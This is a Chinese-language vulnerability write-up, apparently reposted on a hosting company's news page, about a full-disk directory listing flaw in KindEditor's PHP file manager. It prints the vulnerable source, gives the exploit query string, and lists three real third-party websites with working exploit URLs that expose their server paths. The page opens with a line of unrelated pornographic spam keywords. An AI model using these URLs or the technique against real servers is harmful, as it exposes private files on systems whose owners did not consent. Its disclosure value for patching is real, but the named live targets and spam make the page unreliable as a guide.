人妖在线一区,国产日韩欧美一区二区综合在线,国产啪精品视频网站免费,欧美内射深插日本少妇

新聞動態(tài)

Kindeditor特定情況可能會導致全盤瀏覽的漏洞

發(fā)布日期:2021-12-09 11:37 | 文章來源:腳本之家
因為例子很少,開始想了下不是他們的漏洞,后面想了下,后面沒有檢查好用戶的正常配置內容導致,還是提下吧。

下載地址:

貌似是最新版本的。

測試語言:PHP
測試漏洞文件:/kindeditor/php/file_manager_json.php
默認配置(第16行):


$root_path = $php_path . '../attached/';

當/attached/文件夾不存在(被刪)或者被改名為一個不存在的目錄時,如網上的一個例子:

$root_path = $php_path . '../../../upload/';

這個CMS下面的目錄根本就沒得這個目錄,所以就造成了漏洞。

怎么造成了漏洞的呢?我們分析下。

PHP Code復制內容到剪貼板
  1. <?php
  2. /**
  3. *KindEditorPHP
  4. *
  5. *本PHP程序是演示程序,建議不要直接在實際項目中使用。
  6. *如果您確定直接使用本程序,使用之前請仔細確認相關安全設置。
  7. *
  8. */
  10. require_once'JSON.php';
  12. $php_path=dirname(__FILE__).'/';
  13. $php_url=dirname($_SERVER['PHP_SELF']).'/';
  15. //根目錄路徑,可以指定絕對路徑,比如/var/www/attached/
  16. $root_path=$php_path.'../../../upload/';
  17. //根目錄URL,可以指定絕對路徑,比如http://www.yoursite.com/attached/
  18. $root_url=$php_url.'../../../upload/';
  19. //圖片擴展名
  20. $ext_arr=array('gif','jpg','jpeg','png','bmp');
  22. //目錄名
  23. $dir_name=emptyempty($_GET['dir'])?'':trim($_GET['dir']);
  24. if(!in_array($dir_name,array('','image','flash','media','file'))){
  25. echo"InvalidDirectoryname.";
  26. exit;
  27. }
  28. if($dir_name!==''){
  29. $root_path.=$dir_name."/";
  30. $root_url.=$dir_name."/";
  31. if(!file_exists($root_path)){
  32. mkdir($root_path);
  33. }
  34. }
  36. //根據path參數,設置各路徑和URL
  37. if(emptyempty($_GET['path'])){
  38. $current_path=realpath($root_path).'/';
  39. $current_url=$root_url;
  40. $current_dir_path='';
  41. $moveup_dir_path='';
  42. }else{
  43. $current_path=realpath($root_path).'/'.$_GET['path'];
  44. $current_url=$root_url.$_GET['path'];
  45. $current_dir_path=$_GET['path'];
  46. $moveup_dir_path=preg_replace('/(.*?)[^\/]+\/$/','$1',$current_dir_path);
  47. }
  48. //echorealpath($root_path);
  49. //排序形式,nameorsizeortype
  50. $order=emptyempty($_GET['order'])?'name':strtolower($_GET['order']);
  52. //不允許使用..移動到上一級目錄
  53. if(preg_match('/\.\./',$current_path)){
  54. echo'Accessisnotallowed.';
  55. exit;
  56. }
  57. //最后一個字符不是/
  58. if(!preg_match('/\/$/',$current_path)){
  59. echo'Parameterisnotvalid.';
  60. exit;
  61. }
  62. //目錄不存在或不是目錄
  63. if(!file_exists($current_path)||!is_dir($current_path)){
  64. echo'Directorydoesnotexist.';
  65. exit;
  66. }
  68. //遍歷目錄取得文件信息
  69. $file_list=array();
  70. if($handle=opendir($current_path)){
  71. $i=0;
  72. while(false!==($filename=readdir($handle))){
  73. if($filename{0}=='.')continue;
  74. $file=$current_path.$filename;
  75. if(is_dir($file)){
  76. $file_list[$i]['is_dir']=true;//是否文件夾
  77. $file_list[$i]['has_file']=(count(scandir($file))>2);//文件夾是否包含文件
  78. $file_list[$i]['filesize']=0;//文件大小
  79. $file_list[$i]['is_photo']=false;//是否圖片
  80. $file_list[$i]['filetype']='';//文件類別,用擴展名判斷
  81. }else{
  82. $file_list[$i]['is_dir']=false;
  83. $file_list[$i]['has_file']=false;
  84. $file_list[$i]['filesize']=filesize($file);
  85. $file_list[$i]['dir_path']='';
  86. $file_ext=strtolower(pathinfo($file,PATHINFO_EXTENSION));
  87. $file_list[$i]['is_photo']=in_array($file_ext,$ext_arr);
  88. $file_list[$i]['filetype']=$file_ext;
  89. }
  90. $file_list[$i]['filename']=$filename;//文件名,包含擴展名
  91. $file_list[$i]['datetime']=date('Y-m-dH:i:s',filemtime($file));//文件最后修改時間
  92. $i++;
  93. }
  94. closedir($handle);
  95. }
  97. //排序
  98. functioncmp_func($a,$b){
  99. global$order;
  100. if($a['is_dir']&&!$b['is_dir']){
  101. return-1;
  102. }elseif(!$a['is_dir']&&$b['is_dir']){
  103. return1;
  104. }else{
  105. if($order=='size'){
  106. if($a['filesize']>$b['filesize']){
  107. return1;
  108. }elseif($a['filesize']<$b['filesize']){
  109. return-1;
  110. }else{
  111. return0;
  112. }
  113. }elseif($order=='type'){
  114. returnstrcmp($a['filetype'],$b['filetype']);
  115. }else{
  116. returnstrcmp($a['filename'],$b['filename']);
  117. }
  118. }
  119. }
  120. usort($file_list,'cmp_func');
  122. $result=array();
  123. //相對于根目錄的上一級目錄
  124. $result['moveup_dir_path']=$moveup_dir_path;
  125. //相對于根目錄的當前目錄
  126. $result['current_dir_path']=$current_dir_path;
  127. //當前目錄的URL
  128. $result['current_url']=$current_url;
  129. //文件數
  130. $result['total_count']=count($file_list);
  131. //文件列表數組
  132. $result['file_list']=$file_list;
  134. //輸出JSON字符串
  135. header('Content-type:application/json;charset=UTF-8');
  136. $json=newServices_JSON();
  137. echo$json->encode($result);


第三十八行:

$current_path = realpath($root_path) . '/';

當$root_path被realpath以后,不存在的目錄會返回空,然后連接后面的'/'

$current_path所以默認就等于'/'

當提交了$_GET['path']以后,而且$_GET['path']要以'/'為結尾(有驗證),所以,我們就可以構造瀏覽全盤目錄了。

kingedit/php/file_manager_json.php?path=/ (瀏覽盤符的根目錄)

接著上面給出驗證的(互聯網找到幾個):
先給本地的(attached文件夾被我刪了):





互聯網找到的:

http://demo.douco.com/admin/include/kindeditor/php/file_manager_json.php?path=home/demodoucokdce4mmohd8okuoc1o/wwwroot/&dir=image



http://route53.com.tw/static/jscripts/kindeditor/php/file_manager_json.php?path=home/onepage/public_html/



http://www.bndvalve.com/Public/kindeditor/php/file_manager_json.php?path=wwwroot/bonade/

修復方案:再驗證下絕對路徑?

版權聲明:本站文章來源標注為YINGSOO的內容版權均為本站所有,歡迎引用、轉載,請保持原文完整并注明來源及原文鏈接。禁止復制或仿造本網站,禁止在非www.sddonglingsh.com所屬的服務器上建立鏡像,否則將依法追究法律責任。本站部分內容來源于網友推薦、互聯網收集整理而來,僅供學習參考,不代表本站立場,如有內容涉嫌侵權,請聯系alex-e#qq.com處理。

相關文章

實時開通

自選配置、實時開通

免備案

全球線路精選!

全天候客戶服務

7x24全年不間斷在線

專屬顧問服務

1對1客戶咨詢顧問

在線
客服

在線客服:7*24小時在線

客服
熱線

400-630-3752
7*24小時客服服務熱線

關注
微信

關注官方微信
頂部